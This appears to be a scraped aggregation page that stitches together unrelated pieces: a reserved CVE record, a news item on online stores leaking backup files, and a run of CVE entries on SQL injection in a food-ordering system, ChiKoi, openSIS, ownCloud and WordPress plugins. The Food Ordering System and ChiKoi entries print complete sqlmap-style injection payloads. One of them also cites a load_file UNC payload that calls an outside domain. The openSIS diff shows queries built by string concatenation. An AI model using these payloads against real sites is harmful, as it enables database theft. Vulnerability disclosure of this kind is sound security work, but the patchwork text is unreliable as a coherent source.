**According to the CVSS metric, privileges required is low (PR:L). What does that mean for this vulnerability?**

Any authenticated attacker could trigger this vulnerability. It does not require admin or other elevated privileges.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20221213**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221213)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-21705: Microsoft SQL Server Remote Code Execution Vulnerability

Categories: News
Categories: Privacy
Tags: Sansec

Tags:  leaky data

Tags:  online store leaks

Tags:  web skimming

A recent study reveals that while users are comfortable shopping online, a number of online stores are accidentally leaking shoppers' highly sensitive data.



(Read more...)




The post One in nine online stores are leaking your data, says study appeared first on Malwarebytes Labs.

eCommerce security company Sansec has revealed it's found a number of online stores accidentally leaking highly sensitive data.

After studying 2,037 online stores, the company found that 12.3 percent exposed compressed files (in ZIP, SQL, and TAR archive formats), which BleepingComputer noted appear to be private backups containing master database passwords, confidential admin URLs of stores, full customer data (PII, or personally identifiable information), and internal API keys on public-facing web folders without requiring authentication.

The Sansec Threat Research group also found multiple attack patterns coming from various IPs, suggesting that a number of threat actors have known about this online store flaw and are working to exploit it.

In a post, the researchers said:

> "We have observed automated attacks against online stores, where thousands of possible backup names are tried over the course of multiple weeks. Because these probes are very cheap to run and do not affect the target store performance, they can essentially go on forever until a backup has been found."

Sansec urges online web store owners to make sure sure they aren't leaking sensitive data. Start checking if backup files are open to the public internet and, if they are, close them immediately, and investigate the store for any signs of compromise. The company recommends the following steps to site owners in the event of accidental exposure:

*   Check server logs for signs of backup file downloads.
*   Check for unauthorized admin accounts.
*   Change all passwords.
*   Implement two-factor authentication (2FA).
*   Ensure the remote database admin panel isn't showing up on the public internet.
*   Run an eCommerce malware scanner.

Lastly, to avoid creating accidental data leaks on online shops, Sansec advises owners to deploy store code on a read-only file system, schedule frequent backing up of files, restrict access to backup files, and start monitoring for online data exposure.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

One in nine online stores are leaking your data, says study

Food Ordering System v2.0 was discovered to contain a SQL injection vulnerability via the email parameter.

The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can steal all information from the database of this system.

\--\-
Parameter: email (POST)
    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email\=oUTxWXtc@burpcollaborator.net' AND (SELECT 5169 FROM(SELECT COUNT(\*),CONCAT(0x716b627171,(SELECT (ELT(5169=5169,1))),0x71786b7171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)# bwyS&password=r4Q!t5u!L4
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=oUTxWXtc@burpcollaborator.net' AND (SELECT 1469 FROM (SELECT(SLEEP(3)))aKuf)# bETJ&password=r4Q!t5u!L4
\--\-

CVE-2023-24647: CVE-nu11secur1ty/vendors/oretnom23/2023/Food-Ordering-System-v2.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty

ChiKoi v1.0 was discovered to contain a SQL injection vulnerability via the load_file function.

**ChiKoi-1.0-SQLi****Vendor**

**Description:**

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Payload:

\--\-
Parameter: User\-Agent (User\-Agent)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause (subquery \- comment)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND 9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION SELECT 6994) END))-- -
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578\=4578 AND (SELECT 8224 FROM(SELECT COUNT(\*),CONCAT(0x71706b7171,(SELECT (ELT(8224\=8224,1))),0x716a6a6271,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- VCWR
\--\-

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

01:30:00

**Writing an exploit**

00:05:00

**In real time:**

\[+\] Online:

\--\-
Parameter: User\-Agent (User\-Agent)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause (subquery \- comment)
    Payload: Mozilla/5.0 (X11; U; Linux x86\_64; en\-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu\-edgy)' WHERE 8386=8386 AND 8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION SELECT 6426) END))-- -
\---

CVE-2023-24084: CVE-nu11secur1ty/vendors/tanhongit/2023/ChiKoi at main · nu11secur1ty/CVE-nu11secur1ty

Open Solutions for Education, Inc openSIS Community Edition v8.0 and earlier is vulnerable to SQL Injection via CalendarModal.php.

@@ -28,7 +28,7 @@ #\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*  
session\_start(); !empty($\_SESSION\['USERNAME'\]) or die('Access denied!'); //!empty($\_SESSION\['PROFILE\_ID'\]) or die('Access denied!');  
include "functions/ParamLibFnc.php"; echo '<script type="text/javascript" src="assets/js/pages/components\_popups.js"></script>'; @@ -99,14 +99,13 @@ if ($url === FALSE) { header('Location: index.php'); } error\_reporting(E\_ERROR); $isajax = "ajax"; $start\_time = time(); include 'Warehouse.php'; array\_rwalk($\_REQUEST, 'strip\_tags'); $title\_set = '';  
if (UserStudentID() && User('PROFILE') != 'parent' && User('PROFILE') != 'student' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'Atten' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'users' && clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) != 'students/AddUsers.php' && $\_REQUEST\['modname'\]!= 'tools/Backup.php' && (substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 10) != 'attendance' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/StudentSummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/DailySummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/AddAbsences.php')) { if (UserStudentID() && User('PROFILE') != 'parent' && User('PROFILE') != 'student' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'Atten' && substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 5) != 'users' && clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) != 'students/AddUsers.php' && $\_REQUEST\['modname'\] != 'tools/Backup.php' && (substr(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 0, 10) != 'attendance' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/StudentSummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/DailySummary.php' || clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) == 'attendance/AddAbsences.php')) { $RET = DBGet(DBQuery("SELECT FIRST\_NAME,LAST\_NAME,MIDDLE\_NAME,NAME\_SUFFIX FROM students WHERE STUDENT\_ID='" . UserStudentID() . "'")); $count\_student\_RET = DBGet(DBQuery("SELECT COUNT(\*) AS NUM FROM students"));  
@@ -125,8 +124,8 @@ 'students/EnrollmentReport.php', // For Scheduling // 'scheduling/Schedule.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', // 'scheduling/MassSchedule.php', // 'scheduling/MassRequests.php', 'scheduling/PrintSchedules.php', @@ -141,7 +140,7 @@ 'grades/AdminProgressReports.php', 'grades/ProgressReports.php', // 'grades/HonorRoll.php', 'grades/EditReportCardGrades.php', 'grades/EditReportCardGrades.php', // 'grades/GraduationProgress.php', // For Attendance 'attendance/AddAbsences.php', @@ -156,37 +155,32 @@  
$allow\_back\_to\_student\_list = array( // For Students 'students/Student.php', 'students/Student.php', // For Scheduling // 'scheduling/Schedule.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', 'scheduling/ViewSchedule.php', 'scheduling/Requests.php', // For Grades 'grades/EditReportCardGrades.php', 'grades/EditReportCardGrades.php', // For Eligibility 'eligibility/Student.php' );  
if ($count\_student\_RET\[1\]\['NUM'\] > 1) { $title\_set = 'y';  
if(in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { if(in\_array($\_REQUEST\['modname'\], $allow\_back\_to\_student\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=Students/Student.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> '.\_backToStudentList.'</A></span><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div></div>'); } else { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div></div>'); if (in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { if (in\_array($\_REQUEST\['modname'\], $allow\_back\_to\_student\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=Students/Student.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> ' . \_backToStudentList . '</A></span><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div></div>'); } else { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><div class="btn-group heading-btn"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div></div>'); } } } else if ($count\_student\_RET\[1\]\['NUM'\] == 1) { $title\_set = 'y';  
if(in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">'.\_selectedStudent.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div></div></div>'); if (in\_array($\_REQUEST\['modname'\], $allow\_buffer\_list)) { DrawHeaderHome('<div class="panel"><div class="panel-heading"><h6 class="panel-title">' . \_selectedStudent . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . ($RET\[1\]\['MIDDLE\_NAME'\] ? $RET\[1\]\['MIDDLE\_NAME'\] . ' ' : '') . $RET\[1\]\['LAST\_NAME'\] . '&nbsp;' . $RET\[1\]\['NAME\_SUFFIX'\] . '</h6> <div class="heading-elements clearfix"><A HREF=SideForStudent.php?student\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . '&modname=' . $\_REQUEST\['modname'\] . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div></div></div>'); } } } @@ -199,7 +193,7 @@ if ($\_REQUEST\['modname'\] != 'users/User.php') { $RET = DBGet(DBQuery("SELECT FIRST\_NAME,LAST\_NAME FROM staff WHERE STAFF\_ID='" . UserStaffID() . "'")); echo '<div class="panel panel-default">'; DrawHeader(''.\_selectedStaff.' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . $RET\[1\]\['LAST\_NAME'\], '<span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=users/User.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> '.\_backToUserList.'</A></span><div class="btn-group heading-btn"><A HREF=Side.php?staff\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . ' class="btn btn-danger btn-xs">'.\_deselect.'</A></div>'); DrawHeader('' . \_selectedStaff . ' : ' . $RET\[1\]\['FIRST\_NAME'\] . '&nbsp;' . $RET\[1\]\['LAST\_NAME'\], '<span class="heading-text"><A HREF=Modules.php?modname=' . clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS) . '&search\_modfunc=list&next\_modname=users/User.php&ajax=true&bottom\_back=true&return\_session=true target=body><i class="icon-square-left"></i> ' . \_backToUserList . '</A></span><div class="btn-group heading-btn"><A HREF=Side.php?staff\_id=new&modcat=' . clean\_param($\_REQUEST\['modcat'\], PARAM\_NOTAGS) . ' class="btn btn-danger btn-xs">' . \_deselect . '</A></div>'); echo '</div>'; } } @@ -208,10 +202,10 @@ if (!isset($\_REQUEST\['\_openSIS\_PDF'\])) { Warehouse('header');  
// if (strpos(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 'miscellaneous/') === false) // echo '<script language="JavaScript">if(window == top && (!window.opener || window.opener.location.href.substring(0,(window.opener.location.href.indexOf("&")!=-1?window.opener.location.href.indexOf("&"):window.opener.location.href.replace("#","").length))!=window.location.href.substring(0,(window.location.href.indexOf("&")!=-1?window.location.href.indexOf("&"):window.location.href.replace("#","").length)))) window.location.href = "index.php";</script>'; echo "<BODY marginwidth=0 leftmargin=0 border=0 onload='doOnload();' background=assets/bg.gif>"; echo '<DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100"></DIV>'; if (strpos(clean\_param($\_REQUEST\['modname'\], PARAM\_NOTAGS), 'miscellaneous/') === false) echo '<script language="JavaScript">if(window == top && (!window.opener || window.opener.location.href.substring(0,(window.opener.location.href.indexOf("&")!=-1?window.opener.location.href.indexOf("&"):window.opener.location.href.replace("#","").length))!=window.location.href.substring(0,(window.location.href.indexOf("&")!=-1?window.location.href.indexOf("&"):window.location.href.replace("#","").length)))) window.location.href = "index.php";</script>'; // echo "<BODY marginwidth=0 leftmargin=0 border=0 onload='doOnload();' background=assets/bg.gif>"; // echo '<DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100"></DIV>'; }  
$ajax\_to\_sign\_in = ""; @@ -261,8 +255,7 @@  
if (preg\_match('/\\.\\./', $modname) !== 1) include 'modules/' . $modname; } else { } else { if (User('USERNAME')) {  
  
@@ -273,7 +266,7 @@ }  
  
echo "".\_youReNotAllowedToUseThisProgram."! ".\_thisAttemptedViolationHasBeenLoggedAndYourIpAddressWasCaptured."."; echo "" . \_youReNotAllowedToUseThisProgram . "! " . \_thisAttemptedViolationHasBeenLoggedAndYourIpAddressWasCaptured . "."; DBQuery("INSERT INTO hacking\_log (HOST\_NAME,IP\_ADDRESS,LOGIN\_DATE,VERSION,PHP\_SELF,DOCUMENT\_ROOT,SCRIPT\_NAME,MODNAME,USERNAME) values('$\_SERVER\[SERVER\_NAME\]','$ip','" . date('Y-m-d') . "','$openSISVersion','$\_SERVER\[PHP\_SELF\]','$\_SERVER\[DOCUMENT\_ROOT\]','$\_SERVER\[SCRIPT\_NAME\]','$\_REQUEST\[modname\]','" . User('USERNAME') . "')"); Warehouse('footer'); if ($openSISNotifyAddress) @@ -302,7 +295,8 @@ echo '</HTML>'; }  
function decode\_unicode\_url($str) { function decode\_unicode\_url($str) { $res = '';  
$i = 0; @@ -317,11 +311,11 @@ function decode\_unicode\_url($str) { $character = chr($value); else if ($value < 0x0800) // 2 bytes: 110xxxxx 10xxxxxx $character = chr((($value & 0x07c0) >> 6) | 0xc0) . chr(($value & 0x3f) | 0x80); . chr(($value & 0x3f) | 0x80); else // 3 bytes: 1110xxxx 10xxxxxx 10xxxxxx $character = chr((($value & 0xf000) >> 12) | 0xe0) . chr((($value & 0x0fc0) >> 6) | 0x80) . chr(($value & 0x3f) | 0x80); . chr((($value & 0x0fc0) >> 6) | 0x80) . chr(($value & 0x3f) | 0x80); } else $i++;  
@@ -331,21 +325,23 @@ function decode\_unicode\_url($str) { return $res . substr($str, $i); }  
function code2utf($num) { function code2utf($num) { if ($num < 128) return chr($num); if ($num < 1024) return chr(($num >> 6) + 192) . chr(($num & 63) + 128); if ($num < 32768) return chr(($num >> 12) + 224) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); . chr(($num & 63) + 128); if ($num < 2097152) return chr(($num >> 18) + 240) . chr((($num >> 12) & 63) + 128) . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); . chr((($num >> 6) & 63) + 128) . chr(($num & 63) + 128); return ''; }  
function unescape($strIn, $iconv\_to = 'UTF-8') { function unescape($strIn, $iconv\_to = 'UTF-8') { $strOut = ''; $iPos = 0; $len = strlen($strIn); @@ -382,5 +378,3 @@ function unescape($strIn, $iconv\_to = 'UTF-8') { } return $strOut; }  
?>

CVE-2022-45962: Version 9.0 release · OS4ED/openSIS-Classic@81799fd

The ownCloud Android app allows ownCloud users to access, share, and edit files and folders. Prior to version 3.0, the app has an incomplete fix for a path traversal issue and is vulnerable to two bypass methods. The bypasses may lead to information disclosure when uploading the app’s internal files, and to arbitrary file write when uploading plain text files (although limited by the .txt extension). Version 3.0 fixes the reported bypasses.

CVE-2023-24804: GHSL-2022-059_GHSL-2022-060: SQL injection vulnerabilities in Owncloud Android app - CVE-2023-24804, CVE-2023-23948

The Simple URLs WordPress plugin before 115 does not escape some parameters before using them in various SQL statements used by AJAX actions available by any authenticated users, leading to a SQL injection exploitable by low privilege users such as subscriber.

CVE-2023-0098

The WP Yelp Review Slider WordPress plugin before 7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

CVE-2023-0263

The WP Airbnb Review Slider WordPress plugin before 3.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

CVE-2023-0262

The WP TripAdvisor Review Slider WordPress plugin before 10.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

Tag

#sql